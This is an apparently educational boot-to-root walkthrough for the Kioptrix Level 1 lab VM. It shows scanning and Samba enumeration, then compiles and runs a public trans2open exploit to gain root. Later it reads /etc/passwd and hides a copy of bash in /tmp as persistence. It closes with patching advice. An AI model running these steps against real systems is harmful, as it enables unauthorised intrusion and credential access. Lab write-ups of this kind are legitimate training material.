Kioptrix Level 1: Complete Boot2Root Walkthrough

Overview

#

Kioptrix Level 1 is a beginner-friendly vulnerable virtual machine designed for penetration testing practice. This machine simulates a realistic scenario where outdated services present multiple attack vectors. In this walkthrough, we’ll demonstrate a systematic approach to compromise the target through Samba service exploitation.

Machine Information

#

Prerequisites

#

Before beginning this walkthrough, ensure you have:

• Virtualization Platform: VMware or VirtualBox
• Attack Machine: Kali Linux (recommended) or any penetration testing distribution
• Target Machine: Kioptrix Level 1 VM downloaded from VulnHub
• Network Configuration: Both VMs on the same network segment
• Tools Required:
  • Nmap
  • Metasploit Framework
  • Searchsploit
  • GCC Compiler
  • Basic Linux command line knowledge

Step 1: Environment Setup and Network Discovery

#

1.1 Verify Network Connectivity

#

First, ensure both the attack machine and target VM are properly configured and can communicate.

1
2
3
4
5

# Check your current network configuration
ip addr show

# Perform network discovery to identify active hosts
arp-scan -l

Expected Output:

1
2
3
4

Interface: eth0, type: EN10MB, MAC: xx:xx:xx:xx:xx:xx, IPv4: 192.168.10.xxx
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1    00:50:56:c0:00:08    VMware, Inc.
192.168.10.171  00:0c:29:xx:xx:xx    VMware, Inc.  # <- Target Machine

1.2 Alternative Discovery Methods

#

If arp-scan doesn’t detect the target, try these alternatives:

1
2
3
4
5

# Network ping sweep
nmap -sn 192.168.10.0/24

# Or use fping for faster scanning
fping -a -g 192.168.10.1 192.168.10.254 2>/dev/null

Target Identified: 192.168.10.171

Step 2: Reconnaissance and Port Scanning

#

2.1 Initial Port Scan

#

Perform a comprehensive port scan to identify open services:

1
2
3
4
5

# Aggressive scan with service detection and OS fingerprinting
nmap -A -p- -T4 192.168.10.171

# Alternative: Stealth scan with version detection
nmap -sS -sV -O -p- 192.168.10.171

2.2 Scan Results Analysis

#

Key Findings:

1
2
3
4
5
6
7

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  https       Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)

Critical Observations:

• Multiple outdated services running
• Samba service on port 139 - Primary target
• Apache 1.3.20 - Known vulnerabilities
• OpenSSH 2.9p2 - Older version

2.3 Web Service Inspection

#

Quick verification of the web service:

1
2
3
4
5

# Check web server response
curl -I http://192.168.10.171

# Browse to verify test page
firefox http://192.168.10.171 &

Step 3: Service Enumeration

#

3.1 Samba Service Investigation

#

The Samba service presents the most promising attack vector. Let’s enumerate it thoroughly:

1
2
3
4
5
6
7
8

# Basic SMB enumeration
enum4linux -a 192.168.10.171

# Check available shares
smbclient -L //192.168.10.171 -N

# Alternative enumeration
nbtscan 192.168.10.171

3.2 Metasploit SMB Version Detection

#

Launch Metasploit for precise version identification:

1
2
3
4
5
6
7
8

# Start Metasploit console
msfconsole

# Use SMB version scanner
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.10.171
set THREADS 10
run

Critical Discovery: Samba 2.2.1a detected - a version known for critical vulnerabilities.

Step 4: Vulnerability Research

#

4.1 Exploit Database Search

#

Research available exploits for the identified Samba version:

1
2
3
4
5

# Search for Samba 2.2.1a exploits
searchsploit samba 2.2.1a

# Get detailed information about exploits
searchsploit -x multiple/remote/10.c

Search Results:

1
2
3
4
5

Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)
Samba 2.2.0 < 2.2.8 (Solaris SPARC) - trans2open Overflow (Metasploit)  
Samba 2.2.0 < 2.2.8 (UnixWare SPARC) - trans2open Overflow (Metasploit)
Samba 2.2.x - Remote Buffer Overflow                                    
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                       | multiple/remote/10.c

4.2 Exploit Analysis

#

The trans2open buffer overflow (CVE-2003-0201) is our target vulnerability:

• Affects: Samba versions 2.2.0 through 2.2.8
• Type: Remote buffer overflow
• Impact: Remote code execution with root privileges
• Vector: Malformed trans2 request

Step 5: Exploitation Phase

#

5.1 Prepare the Exploit

#

Download and examine the exploit code:

1
2
3
4
5

# Copy exploit to working directory
searchsploit -m multiple/remote/10.c

# Examine the exploit code
cat 10.c | head -50

5.2 Compile the Exploit

#

1
2
3
4
5
6

# Compile the C exploit
gcc -o sambaexploit 10.c

# Verify compilation
ls -la sambaexploit
file sambaexploit

Expected Output:

1
2

-rwxr-xr-x 1 kali kali 17824 Jan 24 10:30 sambaexploit
sambaexploit: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked

5.3 Execute the Exploit

#

Launch the exploit against the target:

1
2
3
4
5

# Execute with automatic target detection
./sambaexploit -b 192.168.10.171

# Alternative: Specify target type manually
./sambaexploit -b 0 192.168.10.171

5.4 Verify Successful Exploitation

#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# Check current user privileges
whoami

# Verify system information
uname -a

# Check network configuration
ifconfig

# Examine user accounts
cat /etc/passwd | grep -E "(root|admin)"

Success Indicators:

1
2

root
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

Step 6: Post-Exploitation Activities

#

6.1 System Information Gathering

#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

# Operating system details
cat /etc/redhat-release

# Kernel version and architecture
uname -mrs

# Available disk space
df -h

# Running processes
ps aux | head -10

# Network connections
netstat -tulpn

6.2 Evidence Collection

#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# Capture proof of compromise
whoami > /tmp/proof.txt
date >> /tmp/proof.txt
hostname >> /tmp/proof.txt

# Locate sensitive files
find / -name "*.txt" -type f 2>/dev/null | grep -E "(flag|proof|root)"

# Check for other users
cut -d: -f1 /etc/passwd | sort

6.3 Persistence (Educational Purposes)

#

Note: Only perform these steps in controlled lab environments:

1
2
3
4
5
6
7
8
9

# Create backup access (educational only)
cp /bin/bash /tmp/.backup

# Check cron jobs
crontab -l
ls -la /etc/cron*

# Examine startup scripts
ls -la /etc/rc.d/

Step 7: Alternative Attack Vectors

#

7.1 Apache/mod_ssl Exploitation

#

The Apache service also presents vulnerabilities:

1
2
3
4
5

# Search for Apache 1.3.20 exploits
searchsploit apache 1.3.20

# mod_ssl vulnerabilities
searchsploit mod_ssl

7.2 SSH Service Analysis

#

1
2
3
4
5

# Check SSH version vulnerabilities
searchsploit openssh 2.9

# Attempt connection
ssh -1 root@192.168.10.171

Defensive Recommendations

#

7.1 Immediate Remediation

#

1. Update Samba Service:

   1 2	# Update to latest stable version yum update samba

2. Patch Operating System:

   1 2	# Apply all security updates yum update

3. Firewall Configuration:

   1 2 3

   # Restrict SMB access iptables -A INPUT -p tcp --dport 139 -s trusted_network -j ACCEPT iptables -A INPUT -p tcp --dport 139 -j DROP

7.2 Long-term Security Measures

#

• Implement regular vulnerability scanning
• Establish patch management procedures
• Deploy network segmentation
• Enable comprehensive logging
• Conduct security awareness training

Lessons Learned

#

Key Takeaways

#

1. Outdated Services = High Risk: The Samba 2.2.1a service was critically vulnerable
2. Multiple Attack Vectors: Several services could have been exploited
3. Reconnaissance is Critical: Proper enumeration revealed the path to compromise
4. Defense in Depth: Multiple security layers could have prevented this attack

Skills Developed

#

• Network reconnaissance techniques
• Service enumeration methodologies
• Vulnerability research processes
• Exploit compilation and execution
• Post-exploitation analysis

Troubleshooting Guide

#

Common Issues and Solutions

#

Issue 1: Target VM not detected

1
2
3

# Solution: Verify network configuration
VBoxManage list hostonlyifs
# Ensure both VMs are on same network segment

Issue 2: Exploit compilation fails

1
2

# Solution: Install build essentials
sudo apt update && sudo apt install build-essential

Issue 3: Exploit execution fails

1
2

# Solution: Try different target options
./sambaexploit -b 1 192.168.10.171  # Try different target

Issue 4: No network connectivity

1
2
3
4

# Solution: Reset network adapter
sudo dhclient eth0
# Or restart networking service
sudo systemctl restart networking

Conclusion

#

The Kioptrix Level 1 machine demonstrates the critical importance of maintaining up-to-date systems. The vulnerable Samba service provided a direct path to root access, highlighting how a single outdated service can compromise an entire system.

This walkthrough covered:

• Systematic reconnaissance methodology
• Service enumeration techniques
• Vulnerability research processes
• Exploit development and execution
• Post-exploitation procedures
• Defensive recommendations

Next Steps

#

1. Practice Variations: Try exploiting other services on this machine
2. Defensive Exercises: Practice hardening similar systems
3. Documentation: Maintain detailed notes of techniques learned
4. Progression: Move to Kioptrix Level 2 for increased difficulty

Additional Resources

#

• VulnHub Kioptrix Series
• Samba Security Advisories
• OWASP Testing Guide
• Penetration Testing Execution Standard

Remember: These techniques should only be used in authorized testing environments. Always obtain proper permission before testing any systems you don’t own.

Happy Hacking and Stay Ethical! 🔒